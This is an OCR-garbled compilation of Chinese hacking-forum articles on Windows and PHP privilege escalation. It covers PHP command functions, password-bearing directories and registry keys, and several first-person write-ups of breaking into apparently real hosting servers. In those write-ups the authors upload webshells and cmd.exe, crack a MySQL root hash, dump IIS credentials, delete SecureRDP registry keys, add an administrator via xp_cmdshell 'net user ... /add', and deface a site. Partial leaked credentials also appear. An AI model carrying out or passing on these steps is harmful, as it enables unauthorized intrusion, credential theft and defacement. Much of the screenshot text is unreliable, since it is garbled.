0x01 可利用的函数

Php 是一种很灵活的脚本语言,同样的,php 环境下执行 DOS 命令的方式也很灵活,php 自身提供 了很多可被用来执行 dos 命令的函数:

Exec() System() passthru() escapeShellCmd() 虽然这几个函数都可以用来执行 DOS 命令,但它们的特性是有区别的:

system() 输出并返回最后一行 shell 结果。

exec()不输出结果,返回最后一行 shell 结果,所有结果可以保存到一个返回的数组里面。 passthru()只调用命令,把命令的运行结果原样地直接输出到标准输出设备上。 escapeShellCmd()先把要执行的命令中的危险字符转义,然后再执行

它们的相同点:都可以获得命令执行的状态码。

另外,这篇文章只是简单讨论一下 php 下执行 DOS 的问题,至于如何安全的执行 DOS,不在本文 讨论之列,就不废话了。



0x02 禁用危险函数

在实际提权过程中,用 php 执行 DOS 命令无回显的话,可以去看看服务器禁用的函数,然后修改上 边的代码使用不同的函数来执行 DOS 命令:

127.0.0.1 - WINN	T - Alexa	
文件管理	服务器时间	2012年06月29日 01:28:09
	服务器域名	localhost
批量挂马	服务器IP地址	127.0.0.1
	服务器操作系统	WINNT
批量清马	服务器操作系统文字编码	zh-cn
	服务器解译引擎	Apache/2.2.16 (Win32) PHP/5.2.14
北重替换	你的IP	127.0.0.1
ᅿᆓᆇᄑ	Web服务端口	80
1日1日小~—1	PHP运行方式	APACHE2HANDLER
系统信息	PHP版本	5.2.14
	运行于安全模式	No
执行命令	服务-器管理员	webmaster@localhost
	本文件路径	C:\php\htdocs\help.php
组件接口	允许使用 URL 打开文件 allow_url_fopen	Yes
	允许动态加载链接库 enable_dl	Yes
打描端口	显示错误信息 display_errors	Yes
地声立体	自动定义全局变量 register_globals	No
这条人什	magic_quotes_gpc	Yes
Linux提权	程序最多允许使用内存量 memory_limit	128M
LINUXIACIA	POST最大字节数 post_max_size	8M
ServU提权	允许最大上传文件 upload_max_filesize	
	程序最长运行时间 max execution time	
MYSQL提权	被禁用的函数 disable_functions	No
	phpinfo()	

那么,最后,说一下如何禁用 php 的危险函数。

在 php.ini 里,有一个名为 disable_functions 的参数:

📕 php.ini-development - 记事本 文件(F) 编辑(E) 格式(0) 查看(V) 帮助(H) ; *NOT* affected by whether Safe Mode is turned On or Off. ; http://php.net/open-basedir ;open basedir = ; This directive allows you to disable certain functions for security reasons. ; It receives a comma-delimited list of function names. This directive is ; *NOT* affected by whether Safe Mode is turned On or Off. : http://php.net/disable-functions disable functions = ; This directive allows you to disable certain classes for security reasons. ; It receives a comma-delimited list of class names. This directive is ; *NOT* affected by whether Safe Mode is turned On or Off. ; http://php.net/disable-classes disable classes = ; Colors for Syntax Highlighting mode. Anything that's acceptable in ; would work. ; http://php.net/syntax-highlighting ;highlight.string = #DD0000 ;highlight.comment = #FF9900 <

比如我这里禁用 system 函数、exec 函数:

127.0.0.1 - WIN	NT - Alexa	
安建祭理	服务器操作系统文字编码	zh-cn
又計管理	服务器解译引擎	Apache/2.2.16 (Win32) PHP/5.2.14
批름井马	你的IP	127.0.0.1
111年1王-2	Web服务端口	80
批量清马	PHP运行方式	APACHE2HANDLER
	PHP版本	5.2.14
批量替换	运行于安全模式	No
	服务器管理员	webmaster@localhost
扫描木马	本文件路径	C:\php\htdocs\help.php
	── 允许使用 URL 打开文件 allow_url_fopen	Yes
糸统信息	允许动态加载链接库 enable_dl	Yes
+#/与本本	显示错误信息 display_errors	No
1241 D 14.	■ 自动定义全局变量 register_globals	No
组件接口	magic_quotes_gpc	No
	■ 程序最多允许使用内存量 memory_limit	128M
扫描端口	POST最大字节数 post_max_size	8M
	允许最大上传文件 upload_max_filesize	2M
搜索文件	程序最长运行时间 max_execution_time	30秒
Linux提权	被禁用的函数 disable_functions	system exec
	phpinfo()	Yes
ServU提权	目前还有空余空间diskfreespace	18536Mb 2 4 CK (1) 9
	图形处理 GD Library	Yes
MYSQL(是权)	IMAP电子邮件系统	Yes Security Team
	MySOI 粉提库	

可以看到, system 和 exec 函数已经被禁用了。需要注意的是, php.ini 中的配置信息, 需要在 apache 服务重新启动之后才会生效。

设想一下,你发现 shell 无法执行命令,但是你的 shell 权限很高,可以读写 php.ini,那你就爽了,自己把禁用的函数去掉,然后让服务器重启一下,再去执行,那就可以了。

第10节 Windows 提权中敏感目录和敏感注册表的利用

作者: yueyan 邮箱: yueyan@f4ck.net 来自: 法客论坛-F4ckTeam 地址: http://team.f4ck.net

0x01 提权中的敏感目录

提权敏感目录	目录权限	提权用途	
C:\Program Files\	默认用户组 users 对该目 录拥有查看 权限	可以查看服务器安装的应 用软件	
C:\Documents and Settings\All Users\「开始」菜 单\程序	Everyone 拥 有查看权限	存放快捷方式,可以下载文 件,属性查看安装路径	
C:\Documents and Settings\All Users\Documents	Everyone 完 全控制权限	上传执行 cmd 及 exp	
$C:\windows\system 32\inetsrv\$	Everyone 完 全控制权限	上传执行 cmd 及 exp	
C:\windows\my.iniC:\Program Files\MySQL\MySQL Server 5.0\my.ini	默认用户组 users 对该目 录拥有查看 权限	安装 mysql 时会将 root 密码 写入该文件	
C:\windows\system32\	默认用户组 users 对该目 录拥有查看 权限	Shift 后门一般是在该文件 夹,可以下载后门破解密码	
C:\Documents and Settings\All Users\「开始」菜 单\程序\启动	Everyone 拥 有查看权限	可以尝试向该目录写入 vbs 或 bat,服务器重启后运行。	
C:\RECYCLER\D:\RECYCL ER\	Everyone 完 全控制权限	回收站目录。常用于执行 cmd及 exp	
C:\Program Files\Microsoft SQL Server\	默认用户组 users 对该目	收集 mssql 相关信息,有时 候该目录也存在可执行权	

	录拥有查看 权限	限	
C:\Program Files\MySQL\C:\ MySQL\ 或者 D: \Program Files\MySQL\D: MySQL\	默认用户组 users 对该目 录拥有查看 权限	在该目录下 MYSQL Server 5.0\data\MYSQL 目录中 user.frm、user.MYD 和 user.MYI 中保存着有 root 密码	
C:\oraclexe\	默认用户组 users 对该目 录拥有查看 权限	可以尝试利用 Oracle 的默 认账户提权	
C:\WINDOWS\system32\conf ig	默认用户组 users 对该目 录拥有查看 权限	尝试下载 sam 文件进行破 解提权	
C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere	默认用户组 users 对该目 录拥有查看 权限	后缀为 cif 的文件中存放这 有 pcanywhere 的密码	
C:\Program Files\Geme6 FTP Server\Remote Admin\Remote.ini	默认用户组 users 对该目 录拥有查看 权限	Remote.ini 文件中存放着 G6FTP 的密码	
c:\Program Files\RhinoSoft.com\Serv-U\c :\Program Files\Serv-U\	默认用户组 users 对该目 录拥有查看 权限	ServUDaemon.ini 中存储了 虚拟主机网站路径和密码	
c:\windows\system32\inetsrv\ MetaBase.xml	默认用户组 users 对该目 录拥有查看 权限	IIS 配置文件	
C:\Program Files\Zend\ZendOptimizer-3.3 .0\lib\Optimizer-3.3.0\php-5.2 .x\ZendOptimizer.dl	Everyone 完 全控制权限	可以尝试上传替换和 zend 提权反弹 cmd	
C:tomcat5.0\conf\resin.conf	默认用户组 users 对该目 录拥有查看 权限	Tomat 存放密码的位置	

stup.ini 默认用户组 users 对该目 ZKEYS 虚拟主机存放密码 录拥有查看 的位置 权限
--

可读可写目录是比较多的,这里以星外为例 星外虚拟主机可写目录总结 C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\ C:\php\PEAR\ C:\Program Files\Zend\ZendOptimizer-3.3.0\ C:\Program Files\Common Files\ C:\7i24.com\iissafe\log\ C:\RECYCLER C:\windows\temp\ c:\Program Files\Microsoft SQL Server\90\Shared\ErrorDumps\ e:\recycler\ f:\recycler\ C:\Program Files\Symantec AntiVirus\SAVRT\ C:\WINDOWS\7i24.com\FreeHost C:\php\dev C:\~1 C:\System Volume Information C:\Program Files\Zend\ZendOptimizer-3.3.0\docs C:\Documents and Settings\All Users\DRM\ C:\Documents and Settings\All Users\Application Data\McAfee\DesktopProtection C:\Documents and Settings\All Users\Application Data\360safe\softmgr\ C:\Program Files\Zend\ZendOptimizer-3.3.0\lib\Optimizer-3.3.0\php-5.2.x\ZendOptimizer.dll C:\7i24.com\LinkGate\log C:\7i24.com\serverdoctor\log\ C:\WINDOWS\Temp\ c:\Documents and Settings\All Users\Application Data\Hagel Technologies\DU Meter\log.csv c:\Program Files\360\360Safe\deepscan\Section\mutex.db c:\Program Files\Helicon\ISAPI_Rewrite3\error.log c:\Program Files\Helicon\ISAPI_Rewrite3\Rewrite.log c:\Program Files\Helicon\ISAPI_Rewrite3\httpd.conf c:\Program Files\Common Files\Symantec Shared\Persist.bak c:\Program Files\Common Files\Symantec Shared\Validate.dat c:\Program Files\Common Files\Symantec Shared\Validate.dat c:\windows\hchiblis.ibl C:\Program Files\Thunder Network\Thunder7\ C:\Program Files\Thunder Network\Thunder\ c:\windows\DriverPacks\C\AM2 C:\Program Files\FlashFXP\ 当然上面的目录只是常见的一部分,一切以实际情况为准!

还有很多敏感目录,大家在实战中多多收集和积累,由于文章篇幅及蛋疼的排版问题,就给大家介绍这些,其他的我会在<u>博客</u>中更新。

0x02 提权中的敏感注册表位置

注册表在 windows 提权过程中有着举足轻重的位置。而有很多人都不太注重注册表这个强大的信息 库。

HKEY_LOCAL_MACHINE\SYSTEM\CurrentC ontrolSet\Control\TerminalServer\ WinStations\RDP-Tcp	在该注册表位置 PortNumber 的值即位3389端 口值
HKEY_LOCAL_MACHINE\SOFTWARE\MyS QL AB\	mssql 的注册表位置
HKEY_LOCAL_MACHINE\SOFTWARE\HZH OST\CONFIG\	华众主机注册表配置位置
HKEY_LOCAL_MACHINE\SOFTWARE\Cat Soft\Serv-U\Domains\1\UserList\	serv-u 的用户及密码(su 加密)位置
HKEY_LOCAL_MACHINE\SYSTEM\LIWEI WENSOFT\INSTALLFREEADMIN\11	星外主机 mssql 的 sa 账号密码,双 MD5加密, 解密后一般无法连接,但是可以用来社工
HKEY_CURRENT_USER\Software\PremiumSo ft\Navicat\Servers	mysql 管理工具 Navicat 的注册表位置, 提权运 用请谷歌
$\label{eq:hkey_local_machine} \begin{split} HKey_local_machine \ System \ RAdmin \ v2.0 \ Server \ Parameters \end{split}$	Radmin 的配置文件,提权中常将其导出进行进行覆盖提权
HKEY_LOCAL_MACHINE\SYSTEM\ControlS et002\Services\MSFtpsvc\Parameters\Virtual Roots\	IIS 注册表全版本泄漏用户路径和 FTP 用户名 漏洞
HKEY_LOCAL_MACHINE\software\hzhost\co nfig\settings\mysqlpass HKEY_LOCAL_MACHINE\software\hzhost\co nfig\settings\mssqlpss HKEY_LOCAL_MACHINE\software\hzhost\co nfig\Settings\mastersvrpass	华众主机在注册表中保存的 mssql、mysql 等密码
HKEY_LOCAL_MACHINE\SOFTWARE\Micr osoft\MSSQLServer\MSSQLServer\SuperSocket NetLib\Tcp	Mssql 端口
HKEY_LOCAL_MACHINE\SYSTEM\ControlS et002\Services\MSFtpsvc\Parameters\Virtual Roots\ControlSet002	星外 FTp 的注册表位置,当然也包括 ControlSet001、ControlSet003
HKLM\SYSTEM\CurrentControlSet\Control\Ter minal Server	DenyTSConnections 远程终端 值为0 即为开 启
HKEY_LOCAL_MACHINE\SOFTWARE\Micr	自动登录密码,有些管理员为了方便连接3389

osoft\WindowsNT\CurrentVersion\Winlogon DefaultUserName DefaultPassword	将密码默认为保存

当然上面的注册表位置只是常见的一部分,一切以实际情况为准!切勿按部就班!!! 还有很多敏感注册表位置,大家在实战中多多收集和积累,其他的我会在博客中更新。

第二章 提权实例

第1节记一次突破星外以及 secure RDP 提权

作者: Tomato 来自: 法客论坛-F4ckTeam 地址: http://team.f4ck.net

..... 0x02 蛋疼的提权

话说我拿到 shell 之后就准备提权,技术菜。。多练习提权。呵呵。 我看到了 freehost。我的心一下就凉了。妈的,星外大神。我草。。。。。 不管这么多了。。。在怎么说也有试试。。。。。。 上传 D 牛的可写目录检测。。。。

🧕 閘D小工具 - 目录读写检测 [ASP版] http://www.d99net.net - 360极速浏览器
← → Q 5 ☆ () value () · · · · · · · · · · · · · · · · · ·
▲ 此网页为 英文 → 网页,是否需要翻译? 翻译 否 一律不翻译英文
重新輸入路径 检测可能需要一定的时间请稍等 [目录]C:\WINDOWS\PCHealth\ERRORREP\QHEADLES\ [目录]C:\WINDOWS\PCHealth\ERRORREP\QSIGNOFF\ [目录]C:\WINDOWS\system32\FxsTmp\ [目录]C:\WINDOWS\system32\FxsTmp\ [目录]C:\WINDOWS\system32\spool\PRINTERS\ [目录]C:\WINDOWS\system32\spool\PRINTERS\ [目录]C:\WINDOWS\system32\spool\PRINTERS\ [目录]C:\WINDOWS\system32\spool\PRINTERS\ [目录]C:\WINDOWS\system32\spool\PRINTERS\ [目录]C:\Wocuments and Settings\All Users\. clamwin\db\bytecode. cld [文件]C:\Documents and Settings\All Users\. clamwin\db\daily. cvd [文件]C:\Documents and Settings\All Users\. clamwin\db\main. cvd [文件]C:\Documents and Settings\All Users\. clamwin\db\mirrors. dat [目录]C:\Documents and Settings\All Users\. clamwin\log\ [文件]C:\Documents and Settings\All Users\. clamwin\quarantine\
日家JC:\Documents and Settings\All Users\Application Data\ 目录]C:\Documents and Settings\All Users\Application Data\Microsoft\Crypto\DSS\MachineKeys\ 目录]C:\Documents and Settings\All Users\Application Data\Microsoft\Crypto\RSA\MachineKeys\ 目录]C:\Documents and Settings\All Users\Application Data\Microsoft\HTML Help\ 文件]C:\Documents and Settings\All Users\Application Data\Microsoft\HTML Help\
[目录]C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\ [文件]C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\rad58933.tmp [文件]C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\rad58933.tmp

找到了这个目录 C:\Documents and Settings\All Users\Documents\My Music\ 果断上传 cmd 把后缀改为 com 成功执行命令

!出登录 文件(夹)管理 Cmd命令 IIS探测 系统进程 系 erv-U提权 注册表查询 端口扫描 数据库管理 端口映射	系统服务 用户(组)信息 t	系统信息 文件搜索	Framework
执行命令>>			
Cmd路径:			
C:\Documents and Settings\All Users\Documents\My Mus	sic\cmd8.com		
语句:			
/c Set		执行	ŕ
ALLUSERSPROFILE=C:\Documents and Settings\All Users APP_POOL_ID=50_FreeHost_1 ClusterLog=C:\WINDOWS\Cluster\cluster.log CommonProgramFiles=C:\Program Files\Common Files COMPUTERNAME=DQ5420-576 ComSpec=C:\WINDOWS\system32\cmd.exe FP_N0_HOST_CHECK=N0 NUMBER_OF_PROCESSORS=8			
OS=Windows_NT Path=C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;. PROCESSOR_ARCHITECTURE=x86 PROCESSOR_IDENTIFIER=x86 Family 6 Model 23 Stepping 6	n32\Wbem;C:\Program Fi WSH 5. GenuineIntel	les\Microsoft SQL Ser	ver\80\Tools\H
PROCESSOR_LEVEL=6 PROCESSOR_REVISION=1706 ProgramFiles=C:\Program Files PROMPT=\$P\$G			
SystemDrive=C: SystemRoot=C:\WINDOWS TEMP=C:\WINDOWS\TEMP			

然后上了几个大杀器。。都没反映。。。 扫了一下端口。。发现 1433 3306 开着的。。。 转战 mssql mysql 提权。。。 执行 tasklist/svc

	SENS, SharedAccess, ShellHWDetec
	TrkWks, winmgmt, wuauserv, WZCSV
spoolsv.exe	940 Spooler
msdtc. exe	1008 MSDTC
svchost. exe	1148 ERSve
FreeHostCServer.exe	1168 FreeHostCServer
inetinfo.exe	1308 IISADMIN, MSFtpsve
sqlservr.exe	134 <u>0_MSSQLSERVER</u>
mysqld-nt.exe	1480 MySQL
svchost. exe	1584 nemotenegistry
vmware-usbarbitrator.exe	1688 VMUSBArbService
mssearch. exe	1940 MSSEARCH
svchost. exe	2200 ₩3SVC
wmiprvse.exe	2704 暂缺
svchost. exe	2800 TermService
w3wp.exe	2848 暂缺

然后执行 sc qc 找到 msysql 的目录

└────────────────────────────────────	选项			
and the second	小米			
退出登录 文件(夹)管理 Cmd命令 IIS探测 系统进程 系统服务 用户(組)信息 系统信息 文件搜索 Serv- Framework Ver:2 U提权 注册表查询 端口扫描 教报库管理 端口映射	0.5072			
Cmd路径: C:\Documents and Settings\All Users\Documents\My Music\cmd8.com				
语句:				
/c sc qc MySQL 执行				
[SC] QueryServiceConfig 成功				
SERVICE_NAME: MySQL TYPE : 10 WIN32 OWN PROCESS				
START_TYPE : 2 AUTO_START FREDE CONTROL : 1 NORMAL				
BINARY_PATH_NAME : "E:\Program Files\MySQL\MySQL Server 5.0\bin\mysqld-nt"defaults-file="E:\Program Files\ LAD DRDER GROUP :	MySQL\W			
TAG : O DISPLAY NAME : MySQL				
DEPENDENCIES : SERVICE_START_NAME : LocalSystem				
小米XX00'				
果断下载 user。Myd 拿到 root 密码 去 cmd5 解密之 。。。。。				
妈的, cmd5 收费。。。。 问了问 piaoker 他帮我解密了。。。。 (piaoker ;	是好人啊			
带我好多伙子) 得到密码 查询结果: $pkidc123$				
区公间年的窑屿郁权贫权无语了 工传 IIIySql 淀权工具				
← → Q う ☆ (1) (1) (1) (1) (1) (1) (1) (1) (1) (1)				
🦳 安全论坛 🦳 牛人博客 🦳 Oday漏洞 🦳 黑客文章 🦳 破解查询 🦳 seo 🦳 免杀				
宮▲ 此网页为 英文 → 网页, 是否需要翻译? 翻译 否 一律不翻译英文				
pass:				
dbname:				
提交				

Copyright By Dark'mOon 2011 Blog:<u>www.moonhack.org</u> Bbs:<u>www.90sec.org</u> 版本更新

填上密码。不知道为啥连接错误



换 mssql 查询注册表

HKEY_LOCAL_MACHINE\SYSTEM\LIWEIWENSOFT\INSTALLFREEADMIN\11 拿到 sa 密码 md5 加密的。解之。。妈的,又收费。不准备用这个了。。 后来,我听 piaoker 说: 星外的 sa 帐号要自己猜。。。 那我更加不想弄了。。。。看了看时间不早了。。 睡 觉去了。。。

第二天,来搞。。。。。 在 aspx 马里转了转发现 D 盘有个目录可以写

9週2月1日加水里吗!狗巴马出!数36月日灶!狗巴达别。

文件(夹)管理	>>
---------	----

当前目录: D:\RECYCLER\

网站目录 | 木马目录 | 新建目录 | 磁盘(C:) | 磁盘(D:) | 磁盘(E:) | 木马

	文件(夹)名	最后修改时间
Ē	Parent Directory	
Ē	S-1-5-21-2125345213-2970857343- 626982681-500	2012-09-25 08:06
	Delete selected	

再次上传 cmd. 执行命令成功 上传 script.exe iis.vbs 成功拿下密码

[7i24虚拟主机管理平台受控端] [State] running [Host] :80 5 - 1 (1995) [User] free <mark>hostr</mark> unat [Pass] 5720969b84e8749764b39fa567331	d80 ! 7
<pre>IIS://LocalHost/W3SVC/724/ROOT C:\</pre>	WINDOWS\7i24.com\FreeHost
[Host]	n .
[User] 1185027185ag	
[Pass] 47C1F04052c53e	
[Host] :8010 million and	
[User] 1185027185ag	
[Pass] 47C1F04052c53e	
[Host] :80: www.selectron	
Filser 1 1185827185an	

但是 3389 没开。 上传了 pr 执行命令成功。 上传开 3389 的东西。。。 一段时间后服务器重启了。。。。 兴高采烈的拿上[User] freehostrunat [Pass] 5720969b84e8749764b39fa567331d80!7 登录。 谁知道出现这个

omputer Name Filter Active - SecureRDP

are not allowed to access to this Terminal Server. Please contact your administrator for more information. Secured by SecureR

确定

妈的,蛋疼啊。。这是什么鸡巴东西,没看到过。。。。。。在群里问了问。。没人说话。。。 百度之 secureRDP 好像是个什么 firewall 翻了翻找到了突破方法 删掉 wtsfilter.dll 删掉注册表键值 HKEY_LOCAL_MACHINE/SOFTWARE/Terminalsoft/WTSFilter 或者 ren 改掉 WTSFilter 的名字 删除的方法: echo y | reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Terminalsoft\WTSFilter

由于用 pr 执行命令蛋疼我上了远控



成功突破了

Ξ



第2节从简单 shell 到突破 360+天网提权

作者: Blackeagle 来自: 法客论坛-F4ckTeam 地址: http://team.f4ck.net

一句话进。。

D:\wwwroot\www\admin\images\					\pm \sim	读取
221.182.236.5 目录(1),文件(27)	名	称	时间	大小	属性	
🥯 C:	- C	_notes	2012-06-27 09:49:46	0	16	
🖃 🥪 D:	2	admin_back.jpg	2008-03-06 16:34:12	7949	32	
🖃 🧰 www.root	23	admin_button_exit.gif	2008-03-06 16:34:14	311	32	
	23	admin_button_fwqk	2008-03-06 16:34:14	424	32	
🖃 🛄 admin	23	admin_button_wzgl	2008-03-06 16:34:14	424	32	
edit		admin_button_xgkl.gif	2008-03-06 16:34:14	331	32	
🗆 💭 Images		admin_m.swf	2008-03-06 16:34:14	8919	32	
		admin_p.gif	2008-03-06 16:34:14	4386	32	
	-	bg.jpg	2008-03-06 16:34:16	876	32	
i dic florb	23	bold.gif	2008-03-06 16:34:16	923	32	
	24	bt_login.gif	2008-03-06 16:34:16	315	32	
	24	center.gif	2008-03-06 16:34:16	906	32	
Js	24	close.gif	2008-03-06 16:34:16	78	32	
jwc	24	delete.gif	2008-03-06 16:34:18	1044	32	
Jypxlist_files	24	email.gif	2008-03-06 16:34:18	990	32	
🚞 logein	24	image.gif	2008-03-06 16:34:18	963	32	
🚞 Mangroup	24	italicize.gif	2008-03-06 16:34:18	910	32	
🚞 ppt	23	no_bt.gif	2008-03-06 16:34:18	221	32	
🚞 sc	23	ok_bt.gif	2008-03-06 16:34:18	223	32	
C SpryAssets	23	open.gif	2008-03-06 16:34:18	76	32	
ts 🖂	23	ow_login_back.gif	2008-03-06 16:34:20	1773	32	
Vedio	23	right.gif	2008-03-06 16:34:20	131	32	
□ wjk_2 □ ,	24	space.gif	2008-03-06 16:34:20	950	32	
yb A		Thumbs.db	2010-04-06 10:12:30	42496	38	
	~ 📷	title point.gif	2008-03-06 16:34:20	93	32	\sim

看看权限



权限很小,啥都看不了。都不能夸目录。

不过已经在 www 下了~网站主页目录^_^

支持 aspx, 那就传个 aspx 马儿看看。

(3						
	++++T-10-0-00()						
Logout	文件管理器 执行命令 IS侦探 进程 服务 用户信息 系统信息 文件搜索 S	J Exp 注册表 端口扫描 数据库 端口转发					
文件	文件管理器 >>						
当前目	当前目录: d:\wwwroot\www\admin\edit\CSS\						
<u>WebRoot 创建目录 创建文件 Fixed(C:) Fixed(D:) CDRom(E:) 白杀(删除木马白身)</u>							
	文件名	最后修改					
0	<u>父目录</u>						
0	blue	2012-05-02 03:40:18					
0	CoolBlue	2012-05-02 03:40:18					

先看看进程~

果断发现 360 以及天网防火墙 (pfw.exe)!!!

编号	名称	路径
0	360rp	"C:\Program Files\360sd\360rps.exe"

执行命令看看

	拒绝访问。
执行命令 >>	
路径: c:\windows\system32\cmd.exe	
参数: /c Set	Submit

没有回显

果断寻找免杀 pr 上传之~过了。呵呵。

Logout	ogout 文件管理器 执行命令 IIS版探 进程 服务 用户信息 系统信息 文件搜索 SU Exp 注册表 端口扫描 数据库 端口转发					
文件上传威功!						
文件	管理器 >>					
当前目	目录: d:\wwwroot\www\admin\edit\CSS\green\					
WebRoot 创建日录 创建文件 Fixed(C.) Fixed(D.) CDRom(E:) 自杀(删除木马自身)						
	文件名	最后修改	大小			
0	公目录					
	Chu.exe	2012-10-18 06:03:10	76.00 K			
	<u>cmd.exe</u>	2012-10-18 06:02:37	460.00 K			
	Editor.css	2008-03-06 08:32:46	3.11 K			
	EditorArea.css	2008-03-06 08:32:48	165 B			
	MenuArea.css	2008-03-06 08:32:48	545 B			
	pr.exe	2012-10-18 06:01:41	40.50 K			
	₩ <u>₩余所选</u>					

执行看看。

执行命令 >>

路径:	
d:\wwwroot\www\admin\edit\CSS\green\cmd.exe	
	I
李致.	
/c ver	Submit

Microsoft Windows XP [版本 5.2.3790]

Microsoft Windows XP [版本 5.2.3790] 没权限,肿么办?求解。

小 A 说他一个一个找的, 翻到了 sa 的帐号密码 , 我咋就没有呢。(提权一定要有恒心 啊)

翻翻 IIS

	当前文件(导入新的文件名称和新的文件)		
	d:\wwwroot\photo\Web.config	Default 👻	
	文件内容		
	allowDefinition="MachineToApplication"/>		
	<connectionstrings></connectionstrings>		
ſ	<add connectionstring="server=127.0.0.1;user id=root;passwo:</td><td>rd=rootrootroot;</td><td></td></tr><tr><td>l</td><td><pre>database=GS1;character set=utf8" name="MySql" providername="MySql.Data.MySqlClient"></add>		Ξ
5			
	<system.web></system.web>		_
	<customerrors mode="Off"></customerrors>		

去 database 试了试,不行。

继续。。

功夫不负有心人~

server=localhost;UID=sa;PWD=xxoo;database=syjj;Provider=SQLOLEDB

果断连接之~

建立帐号

360 突破简单,直接/ad 就过了。

天网呢?我愁。。

喝点咖啡。。想想~

因为我们已经拿到了 sa

直接关了试试。。。

<u>Kill</u>

发现这个,果断点了。嘿嘿, RP 好,不过如果没有 kill,又该如何去突破呢?



问问。。。不过估计他睡了~

	100 IVI
SrvRoleMember : sa	
Please select a database : master SQLExec : XP_cmdshell exec	•
Exec master.dbo.xp_cmdshell 'net user 1 1 /add &net localgroup administrators 1 /add'	
Query	
命令成功完成。	

因为前面看到了链接 扫 4430 端口

端口扫描 >>

IP: 127.0.0.1 Port: 4430	P:	127.0.0.1	Port :	4430	
--------------------------	----	-----------	--------	------	--

127.0.0.1 : 4430 Open

开着的。

链接之。。。

15 CLA						
3	· 录到 Windows					
-	Microsoft					
	Windows Server 2003 R2					
c	apyright © 2005 Microsoft Corporation Microsoft					
ļ	利户名 (1):					
ą	密码 (2):					
_						

1	应用程序)进程	性能 联网	用户	
stell	-CPV 使用	CPU 使用记载	₹	
er A				
9	0.5			
jē	2 8			
記置向 早	PF 使用	页面文件使用记录		
et la				
	913 MB	Jenson a		
L雷5	一总数		□物理内存 00	
	句柄数	18134	总数	4194004
	就程数	45	可用蚁 系统缓存	3454160
	_ 内存使用 (K)		核心内存的	
	总数	935180	总数	75492
	限制	6117788	分页数	49144
	中年1日	000166	*77.90	20390

最后感谢小A哈~还是你细心。

最最后弱弱问一句,.net 建的站,为毛访问 aspx 页面不卡,访问 asp 页面就特别卡啊?

第3节跟着黑客走吃喝全都有,提权(一)

作者: Doing 来自: 法客论坛-F4ckTeam 地址: http://team.f4ck.net

• • • • • •

三、成功路过

咋一看网站是.net系统。。直接搞一只 ASPX 的大马上去,嘿嘿。。 权限还是不小的。

0 泊腔	- 🕗 - 🔽 🛐 🚺 🏸 15 ж	X 9X,084. X	🗢 🔯 🖓 🖂	
地址 (D)	🛃 http://www.h	uiml		

一个比较帅气小伙 路过贵站

HACKED By:slay

QQ: 269**16...**

you are a hacker ? a team in QQ group :1102

成功路过了。。

这么大的权限想 R 下服务器。

后面的过程的真的是惨不忍睹。。害的我 XXOO 了几个小时啊。。

Logout File Manager CmdShell IIS Spy Process Services UserInfo SysInfo FileSearch SU	Exp RegShell PortScan DataBase PortMap
	拒绝访问。
Execute Command >>	
CmdPath: c:/windows\system32\cmd.exe]
Argument /c Set	Submit
Copyright © 2006-2009 <u>Bin'Blog</u> All Rights Reserved.	

呵呵 被权限了, user 是没权限的。
那就上传一个吧

0 0

ogout | File Manager | CmdShell | IIS Spy | Process | Services | UserInto | SysInto | FileSearch | SU Exp | RegShell | PortSi

Execute Command >>

CmdPath: D:\RECYCLER\cmd.exe

Argument: /c Set

Submit

ALLUSERSPROFILE=C:\Documents and Settings\All Users APP_POOL_ID=hostlx_2 ClusterLog=C:\WINDOWS\Cluster\cluster.log CommonProgramFiles=C:\Program Files\Common Files COMPUTERNAME=ZZIDC-7F6547501 ComSpec=C:\WINDOWS\system32\cmd.exe FP_NO_HOST_CHECK=NO lib=C:\Program Files\SQLXML 4.0\bin\ NUMBER_OF_PROCESSORS=2 OS=Windows_NT Path=C:\WINDOWS\system32;C:\WINDOWS\C:\WINDOWS\System32\Wbem;C:\Program Files\Microsoft SQL S PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH PHPRC=C:\IMP\PHP5 PROCESSOR_ARCHITECTURE=x86 PROCESSOR_IDENTIFIER=x86 Family 6 Model 23 Stepping 10, GenuineIntel PROCESSOR_LEVEL=6

四、没权限

尼玛这权限惊人,居然连 ipconfig /all 都没显示。。我 Xx 哦。而且那悲剧的是系统补丁 修补了那么多。。估计我手里的那几个 0day 也无能为力了。查看系统信息

systeminfo

系统型号:	DG41CN
系统类型:	X86-based PC
处理器:	安装了 2 个处理器。
	[01]: x86 Family 6 Model 23 Stepping 10 GenuineIntel ~3192 Mhz
	[02]: x86 Family 6 Model 23 Stepping 10 GenuineIntel ~3192 Mhz
BIOS 版本:	Intel - 12
Windows 目录:	C:\UINDOUS
系统目录:	C:\WINDOWS\system32
启动设备:	\Device\HarddiskVolumel
系统区域设置:	zh-cn;中文(中国)
输入法区域设置:	暂缺
时区:	(GMT+08:00) 北京,重庆,香港特别行政区,乌鲁木齐
物理内存总量:	4,057 MB
可用的物理内存:	2,943 MB
页面文件: 最大值:	5,934 MB
页面文件: 可用:	4,891 MB
页面文件: 使用中:	1,043 MB
页面文件位置:	c:\pagefile.sys
域:	WORKGROUP
登录服务器:	暂缺
修补程序:	安装了 344 个修补程序。
	[01]: File 1
	[02]: File 1
	[03]: File 1
	[04]: File 1
	[05]: File 1
	[06]: File l
	[07]: File 1
	[08]: File l
	[09]: File 1
	[10]: File 1
	[11]: File 1
	[12]: File 1

Sp	y>>				1.4	
	IIS_USE	IIS_PASS	Domain	Λ	Path	th.
	IUS 77 10072004000	030E-01-0407-0407			<u>c:\inetput</u>	
		D7LI4@	80 m 1 0	bstcom	Eltwebro	
		XGER4D	:80:ce :80:ce	ost.com	E:twebro	r I
		;NKEKZ	:80:wv :80:yat :80:wv	t.com	Etwehro	
	welk	300001	:80:we :80:we :80:we	s com	Etwe b w	40
	ww.	G?3(<mark>7</mark> 7	90:ww	thost.com	<u>Etwand of wa</u>	w 1 veb
	IUS I I I I I I I I I I I I I I I I I I	A))\$:V3v940Y	24:		<u>Inte</u>	
		XBX k		and the second	EM C F	Y
	72 (3 (Z>9	1.50		E I I I I I I I	2

我翻啊翻目录,我就奇怪了什么站都能跨过去。

